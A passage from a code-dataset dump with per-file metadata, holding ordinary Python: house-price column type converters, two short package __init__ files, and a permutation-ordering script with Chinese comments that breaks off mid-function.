df = self.to_str(df, col_key)
return df
def col_14_BsmtQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_15_BsmtUnfSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_16_CentralAir(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_17_Condition1(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_18_Condition2(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_19_Electrical(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_20_EnclosedPorch(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_21_ExterCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_22_ExterQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_23_Exterior1st(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_24_Exterior2nd(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_26_FireplaceQu(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_27_Fireplaces(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_28_Foundation(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_29_FullBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_30_Functional(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_31_GarageArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_32_GarageCars(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_33_GarageCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_34_GarageFinish(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_35_GarageQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_36_GarageType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_37_GarageYrBlt(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_38_GrLivArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_39_HalfBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_40_Heating(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_41_HeatingQC(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_42_HouseStyle(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_43_Id(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_44_KitchenAbvGr(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_45_KitchenQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_46_LandContour(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_47_LandSlope(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_48_LotArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_49_LotConfig(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_50_LotFrontage(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_51_LotShape(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_52_LowQualFinSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_53_MSSubClass(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_54_MSZoning(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_55_MasVnrArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_56_MasVnrType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_58_MiscVal(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_59_MoSold(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_60_Neighborhood(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_61_OpenPorchSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_62_OverallCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_63_OverallQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_64_PavedDrive(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_65_PoolArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_67_RoofMatl(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_68_RoofStyle(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_69_SaleCondition(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_71_SaleType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_72_ScreenPorch(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_73_Street(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_74_TotRmsAbvGrd(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_75_TotalBsmtSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_77_WoodDeckSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_78_YearBuilt(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_79_YearRemodAdd(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_80_YrSold(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
| 38.451977
| 118
| 0.632236
| 2,294
| 13,612
| 3.485179
| 0.083697
| 0.075047
| 0.146091
| 0.103189
| 0.843277
| 0.843277
| 0.843277
| 0.843277
| 0.843277
| 0.843277
| 0
| 0.015881
| 0.255216
| 13,612
| 353
| 119
| 38.560907
| 0.772736
| 0
| 0
| 0.618026
| 0
| 0
| 0.005355
| 0.004224
| 0
| 0
| 0
| 0
| 0
| 1
| 0.330472
| false
| 0
| 0.008584
| 0.025751
| 0.669528
| 0.025751
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1f3dd4e43cfc2a0fcf745ee0d4a8bc13b62bb6b0
| 96
|
py
|
Python
|
vex/parsers/__init__.py
|
gitmoneyyy123/VintageEx
|
4f81b8a6ef9d7ff0572bfa9728ad38ac0c8e7368
|
[
"MIT"
] | 134
|
2015-01-09T22:23:51.000Z
|
2022-03-17T16:25:14.000Z
|
vex/parsers/__init__.py
|
gitmoneyyy123/VintageEx
|
4f81b8a6ef9d7ff0572bfa9728ad38ac0c8e7368
|
[
"MIT"
] | 3
|
2015-12-16T08:15:30.000Z
|
2020-08-18T05:49:41.000Z
|
vex/parsers/__init__.py
|
gitmoneyyy123/VintageEx
|
4f81b8a6ef9d7ff0572bfa9728ad38ac0c8e7368
|
[
"MIT"
] | 27
|
2015-01-21T18:22:34.000Z
|
2019-09-01T12:26:21.000Z
|
from vex.parsers import cmd_line
from vex.parsers import g_cmd
from vex.parsers import s_cmd
| 24
| 33
| 0.8125
| 18
| 96
| 4.166667
| 0.444444
| 0.28
| 0.56
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 96
| 3
| 34
| 32
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2f786235e3db248ff91325cbc24bd4b4eb9689dd
| 189
|
py
|
Python
|
tzlocal/__init__.py
|
serialbandicoot/tzlocal
|
f5c35ce9ab3efe3cfb60bd80de85dad91236576a
|
[
"MIT"
] | null | null | null |
tzlocal/__init__.py
|
serialbandicoot/tzlocal
|
f5c35ce9ab3efe3cfb60bd80de85dad91236576a
|
[
"MIT"
] | null | null | null |
tzlocal/__init__.py
|
serialbandicoot/tzlocal
|
f5c35ce9ab3efe3cfb60bd80de85dad91236576a
|
[
"MIT"
] | null | null | null |
import sys
if sys.platform == "win32":
from tzlocal.win32 import get_localzone, reload_localzone # pragma: no cover
else:
from tzlocal.unix import get_localzone, reload_localzone
| 27
| 81
| 0.767196
| 26
| 189
| 5.423077
| 0.576923
| 0.156028
| 0.255319
| 0.340426
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025316
| 0.164021
| 189
| 6
| 82
| 31.5
| 0.867089
| 0.084656
| 0
| 0
| 0
| 0
| 0.02924
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2f882fb85e2e9134c7665871ff7d24193ee4b515
| 24,453
|
py
|
Python
|
permutations1.py
|
YanshuHu/combinatorics-oj1
|
551286aaac63094b74a3bbb00462a1bd696608fd
|
[
"Apache-2.0"
] | null | null | null |
permutations1.py
|
YanshuHu/combinatorics-oj1
|
551286aaac63094b74a3bbb00462a1bd696608fd
|
[
"Apache-2.0"
] | null | null | null |
permutations1.py
|
YanshuHu/combinatorics-oj1
|
551286aaac63094b74a3bbb00462a1bd696608fd
|
[
"Apache-2.0"
] | null | null | null |
def main():
variable1 = input()
variable2 = input()
a = variable1.split()
b = variable2.split()
first_line = []
second_line = []
for i in a:
first_line.append(int(i))
for i in b:
second_line.append(int(i))
add = True
type = first_line[1]
n = first_line[0]
if first_line[2] >= 0:
add = True
if first_line[2] < 0:
add = False
lst = second_line
k = abs(int(first_line[2]))
if type == 1:
if add == True:
output = dict_order(add_1(second_line, k, n))
else:
output = dict_order(subtract_1(second_line, k ,n))
if type == 2:
if add == True:
output = order_2(add_2(second_line, k, n))
else:
output = order_2(subtract_2(second_line, k,n))
if type == 3:
if add == True:
output = order_3(add_3(second_line,k, n))
else:
output = order_3(subtract_3(second_line, k,n))
if type == 4:
if add == True:
output = order_4(add_4(second_line,k, n))
else:
output = order_4(subtract_4(second_line, k,n))
final = ' '.join(str(i) for i in output)
print(final)
############### 字典
def shift_1(lst):
new_lst = lst
shifted_num = []
while new_lst:
count = 0
compare = new_lst[0]
for i in range(len(new_lst)):
if new_lst[i] < new_lst[0]:
count += 1
shifted_num.append(count)
del new_lst[0]
shifted_num.pop()
return shifted_num
def add_1(lst, k, n):
line_two = shift_1(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
#print(reverse_line_two[0])
#print(k)
step_one = reverse_line_two[0] + k
first_carry = step_one//line_one[0]
if step_one >= line_one[0]:
#first_carry = step_one//line_one[0]
#print("first_carry: ", first_carry)
first_append = step_one%line_one[0]
#print("first_append: ", first_append)
final_list.append(first_append)
if step_one < line_one[0]:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print(reverse_line_two)
while index < (n -1):
#print("current_carry: ", current_carry)
if (reverse_line_two[index]) + current_carry >= line_one[index]:
res = reverse_line_two[index] + current_carry
current_carry = res//line_one[index]
#print("appending: ",res%line_one[index])
final_list.append(res%line_one[index])
index += 1
if (reverse_line_two[index] + current_carry) < line_one[index]:
res1 = reverse_line_two[index] + current_carry
current_carry = 0
#print("appending: ",res1%line_one[index])
final_list.append(res1)
index += 1
#print("final_list: ", final_list[::-1])
return final_list[::-1]
def subtract_1(lst, k, n):
line_two = shift_1(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
step_one = reverse_line_two[0] - k
#print(step_one)
if step_one < 0:
first_carry = -((step_one) // line_one[0])
first_append = step_one%line_one[0]
#print(first_append)
final_list.append(first_append)
if step_one >= 0:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print("current_carry: ", current_carry)
while index < (n-1):
#print("current_carry: ", current_carry)
if reverse_line_two[index] - current_carry < 0:
res = reverse_line_two[index] - current_carry
#print("res: ",res)
final_list.append(res%line_one[index])
current_carry = -(res//line_one[index])
index += 1
if reverse_line_two[index] - current_carry >= 0:
res1 = reverse_line_two[index] - current_carry
current_carry = 0
final_list.append(res1)
index += 1
# print("line_one: ", line_one, "line_two: ", reverse_line_two)
# print("append value: ",(reverse_line_two[0]-k)%line_one[0])
# final_list.append((reverse_line_two[0]-k)%line_one[0])
# print("carry value: ", first_carry, final_list)
# print("carried: ", reverse_line_two[1] - first_carry )
# carried = reverse_line_two[1] - first_carry
# second_append = (carried)%line_one[1]
# final_list.append(second_append)
#print(final_list[::-1])
return final_list[::-1]
def num_smaller(lst, b):
'''
lst is the list from mylist[:i]
b is the comparator which is current_carry
'''
current_carry = b
while True:
count = 0
for i in range(len(lst)):
if lst[i] < current_carry:
#print("lst: ", lst, "current_carry: ", current_carry)
count += 1
lst[i] = 100
current_carry += 1
if count == 0:
break
#print(current_carry)
return current_carry
def dict_order(lst):
limit = len(lst) + 1
mylist = []
for i in range(limit):
mylist.append(-1)
for i in range(len(lst)):
has_bigger = True
current_carry = lst[i] + 1
if i == 0:
mylist[0] = (current_carry)
temp = mylist[:i]
if i > 0:
smaller = num_smaller(mylist[:i],current_carry)
#print("lst: ", mylist[:i], "current_carry: ", current_carry, "smaller: ", smaller)
if smaller not in mylist[:i]:
mylist[i] = smaller
while (smaller) in mylist[:i]:
smaller += 1
mylist[i] = smaller
left = []
no = []
for i in range(len(mylist)):
left.append(i+1)
for i in left:
if i not in mylist:
no.append(i)
for i in range(len(mylist)):
if mylist[i] == -1:
mylist[i] = no[0]
#print(mylist)
return mylist
###############
###############加
def shift_2(lst):
new_lst = lst
line_two = []
while new_lst:
count = 0
biggest = max(new_lst)
biggest_index = new_lst.index(biggest)
for i in new_lst[biggest_index+1:]:
if i < biggest:
count += 1
line_two.append(count)
del new_lst[biggest_index]
line_two.pop()
#print("line_two: ", line_two)
return line_two
def add_2(lst, k, n):
line_two = shift_2(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
step_one = reverse_line_two[0] + k
if step_one >= line_one[0]:
first_carry = step_one//line_one[0]
#print("first_carry: ", first_carry)
first_append = step_one%line_one[0]
#print("first_append: ", first_append)
final_list.append(first_append)
if step_one < line_one[0]:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print(reverse_line_two)
while index < (n -1):
#print("current_carry: ", current_carry)
if (reverse_line_two[index]) + current_carry >= line_one[index]:
res = reverse_line_two[index] + current_carry
current_carry = res//line_one[index]
#print("appending: ",res%line_one[index])
final_list.append(res%line_one[index])
index += 1
if (reverse_line_two[index] + current_carry) < line_one[index]:
res1 = reverse_line_two[index] + current_carry
current_carry = 0
#print("appending: ",res1%line_one[index])
final_list.append(res1)
index += 1
#print("final_list: ", final_list)
return final_list[::-1]
def subtract_2(lst, k, n):
line_two = shift_2(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
step_one = reverse_line_two[0] - k
#print(step_one)
if step_one < 0:
first_carry = -((step_one) // line_one[0])
#print(first_carry)
first_append = step_one%line_one[0]
#print(first_append)
final_list.append(first_append)
if step_one >= 0:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print("final_list: ", final_list)
while index < (n-1):
#print("current_carry: ", current_carry)
#print("index: ", reverse_line_two[index])
#print(reverse_line_two[index] - current_carry)
if reverse_line_two[index] - current_carry < 0:
res = reverse_line_two[index] - current_carry
#print("res: ",res)
final_list.append(res%line_one[index])
current_carry = -(res//line_one[index])
index += 1
if reverse_line_two[index] - current_carry >= 0:
res1 = reverse_line_two[index] - current_carry
current_carry = 0
final_list.append(res1)
index += 1
# print("line_one: ", line_one, "line_two: ", reverse_line_two)
# print("append value: ",(reverse_line_two[0]-k)%line_one[0])
# final_list.append((reverse_line_two[0]-k)%line_one[0])
# print("carry value: ", first_carry, final_list)
# print("carried: ", reverse_line_two[1] - first_carry )
# carried = reverse_line_two[1] - first_carry
# second_append = (carried)%line_one[1]
# final_list.append(second_append)
#print(final_list)
return final_list[::-1]
def find_it_2(new_list,index,value):
num = 0
for i in range(len(new_list)):
if new_list[i] == -1:
num+=1
if num == index+1:
new_list[i] = value
#print("new list: ", new_list )
return new_list
#return from 中介数
def order_2(lst):
top = []
limit = len(lst) + 1
for i in range(limit):
top.append(i + 1)
top.pop(0)
new_top = top[::-1]
new_lst = lst
temp = []
for i in range(len(new_lst)+1):
temp.append(-1)
#print("new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
for i in range(len(new_lst)):
#print(new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
temp = find_it_2(temp, new_lst[i], new_top[i])
for i in range(len(temp)):
if temp[i] == -1:
temp[i] = 1
#print(temp[::-1])
return temp[::-1]
###############增
###############减
#get 中介数
def shift_3(lst):
new_lst = lst
line_two = []
while new_lst:
count = 0
biggest = max(new_lst)
biggest_index = new_lst.index(biggest)
for i in new_lst[biggest_index+1:]:
if i < biggest:
count += 1
line_two.append(count)
del new_lst[biggest_index]
line_two.pop()
#print("line_two: ", line_two)
#print(line_two[::-1])
return line_two[::-1]
def add_3(lst, k, n):
line_two = shift_3(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
line_one = line_one[::-1]
#print("line_one: ", line_one)
#print("reverse_line_two: ", reverse_line_two)
step_one = reverse_line_two[0] + k
if step_one >= line_one[0]:
first_carry = step_one//line_one[0]
#print("first_carry: ", first_carry)
first_append = step_one%line_one[0]
#print("first_append: ", first_append)
final_list.append(first_append)
if step_one < line_one[0]:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print(reverse_line_two)
while index < (n -1):
#print("current_carry: ", current_carry)
if (reverse_line_two[index]) + current_carry >= line_one[index]:
res = reverse_line_two[index] + current_carry
current_carry = res//line_one[index]
#print("appending: ",res%line_one[index])
final_list.append(res%line_one[index])
index += 1
if (reverse_line_two[index] + current_carry) < line_one[index]:
res1 = reverse_line_two[index] + current_carry
current_carry = 0
#print("appending: ",res1%line_one[index])
final_list.append(res1)
index += 1
#print("final_list: ", final_list)
return final_list[::-1]
def subtract_3(lst, k, n):
line_two = shift_3(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
line_one = line_one[::-1]
step_one = reverse_line_two[0] - k
#print(step_one)
if step_one < 0:
first_carry = -((step_one) // line_one[0])
#print(first_carry)
first_append = step_one%line_one[0]
#print(first_append)
final_list.append(first_append)
if step_one >= 0:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print("final_list: ", final_list)
while index < (n-1):
#print("current_carry: ", current_carry)
#print("index: ", reverse_line_two[index])
#print(reverse_line_two[index] - current_carry)
if reverse_line_two[index] - current_carry < 0:
res = reverse_line_two[index] - current_carry
#print("res: ",res)
final_list.append(res%line_one[index])
current_carry = -(res//line_one[index])
index += 1
if reverse_line_two[index] - current_carry >= 0:
res1 = reverse_line_two[index] - current_carry
current_carry = 0
final_list.append(res1)
index += 1
# print("line_one: ", line_one, "line_two: ", reverse_line_two)
# print("append value: ",(reverse_line_two[0]-k)%line_one[0])
# final_list.append((reverse_line_two[0]-k)%line_one[0])
# print("carry value: ", first_carry, final_list)
# print("carried: ", reverse_line_two[1] - first_carry )
# carried = reverse_line_two[1] - first_carry
# second_append = (carried)%line_one[1]
# final_list.append(second_append)
#print(final_list)
return final_list[::-1]
def find_it_3(new_list,index,value):
num = 0
for i in range(len(new_list)):
if new_list[i] == -1:
num+=1
if num == index+1:
new_list[i] = value
print("new list: ", new_list)
return new_list
#return from 中介数
def order_3(lst):
top = []
limit = len(lst) + 1
for i in range(limit):
top.append(i + 1)
top.pop(0)
new_top = top[::-1]
new_lst = lst[::-1]
#print("top: ",top, "new_lst: ", new_lst)
temp = []
for i in range(len(new_lst)+1):
temp.append(-1)
#print("new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
for i in range(len(new_lst)):
#print(new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
temp = find_it_3(temp, new_lst[i], new_top[i])
for i in range(len(temp)):
if temp[i] == -1:
temp[i] = 1
#print(temp[::-1])
return temp[::-1]
###############加
###############邻排列
# def shift_4(lst):
# new_lst = lst
# shifted_num = []
# while new_lst:
# count = 0
# biggest = max(new_lst)
# biggest_index = new_lst.index(biggest)
# for i in range(len(new_lst[biggest_index:])):
# if new_lst[i] < biggest:
# count += 1
# shifted_num.append(count)
# del new_lst[biggest_index]
# shifted_num.pop()
# a = shifted_num[::-1]
# return a
def shift_4(lst):
line_one = []
#print(lst)
reverse_line_two = lst
#print(reverse_line_two)
shifted_num = []
reverse_line_two = reverse_line_two[::-1]
#print(reverse_line_two)
limit = len(reverse_line_two)
#print(limit)
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
left = reverse_line_two[:i]
right = reverse_line_two[i:]
reverse_line_two1 = lst[1:]
#print(len(reverse_line_two1))
#print("line_one: ", line_one, "reverse_line_two: ", reverse_line_two, "reverse_line_two1: ", reverse_line_two1)
for i in range(len(reverse_line_two1)):
count = 0
if i == 0:
for j in left:
if line_one[i] > j:
count+=1
shifted_num.append(count)
#print(shifted_num)
if i > 0:
if line_one[i] % 2 == 1:
if shifted_num[i-1]%2 ==0:
for j in reverse_line_two[:reverse_line_two.index(line_one[i])]:
if line_one[i] > j:
count+=1
shifted_num.append(count)
elif shifted_num[i-1]%2 ==1:
for j in reverse_line_two[reverse_line_two.index(line_one[i]):]:
if line_one[i] > j:
count+=1
shifted_num.append(count)
elif line_one[i] % 2 == 0:
if (shifted_num[i-1]+shifted_num[i-2])%2 ==0:
for j in reverse_line_two[:reverse_line_two.index(line_one[i])]:
if line_one[i] > j:
count+=1
shifted_num.append(count)
if (shifted_num[i-1]+shifted_num[i-2])%2 ==1:
for j in reverse_line_two[reverse_line_two.index(line_one[i]):]:
if line_one[i] > j:
count+=1
shifted_num.append(count)
#print("shifted_num: ",shifted_num)
return shifted_num
def add_4(lst, k, n):
line_two = shift_4(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
line_one = line_one[::-1]
#print("line_one: ", line_one)
#print("reverse_line_two: ", reverse_line_two)
step_one = reverse_line_two[0] + k
if step_one >= line_one[0]:
first_carry = step_one//line_one[0]
#print("first_carry: ", first_carry)
first_append = step_one%line_one[0]
#print("first_append: ", first_append)
final_list.append(first_append)
if step_one < line_one[0]:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print(reverse_line_two)
while index < (n -1):
#print("current_carry: ", current_carry)
if (reverse_line_two[index]) + current_carry >= line_one[index]:
res = reverse_line_two[index] + current_carry
current_carry = res//line_one[index]
#print("appending: ",res%line_one[index])
final_list.append(res%line_one[index])
index += 1
if (reverse_line_two[index] + current_carry) < line_one[index]:
res1 = reverse_line_two[index] + current_carry
current_carry = 0
#print("appending: ",res1%line_one[index])
final_list.append(res1)
index += 1
#print("final_list: ", final_list)
return final_list[::-1]
def subtract_4(lst, k, n):
line_two = shift_4(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
line_one = line_one[::-1]
step_one = reverse_line_two[0] - k
#print(step_one)
if step_one < 0:
first_carry = -((step_one) // line_one[0])
#print(first_carry)
first_append = step_one%line_one[0]
#print(first_append)
final_list.append(first_append)
if step_one >= 0:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print("final_list: ", final_list)
while index < (n-1):
#print("current_carry: ", current_carry)
#print("index: ", reverse_line_two[index])
#print(reverse_line_two[index] - current_carry)
if reverse_line_two[index] - current_carry < 0:
res = reverse_line_two[index] - current_carry
#print("res: ",res)
final_list.append(res%line_one[index])
current_carry = -(res//line_one[index])
index += 1
if reverse_line_two[index] - current_carry >= 0:
res1 = reverse_line_two[index] - current_carry
current_carry = 0
final_list.append(res1)
index += 1
return final_list[::-1]
def find_it_4(new_list,index,value):
num = 0
for i in range(len(new_list)):
if new_list[i] == -1:
num+=1
if num == index+1:
new_list[i] = value
return new_list
def find_it_neg_4(new_list,index,value):
num = 0
lst = new_list[::-1]
for i in range(len(new_list)):
if lst[i] == -1:
num+=1
if num == index+1:
lst[i] = value
a = lst[::-1]
return a
def order_4(lst):
lst1 = lst[::-1]
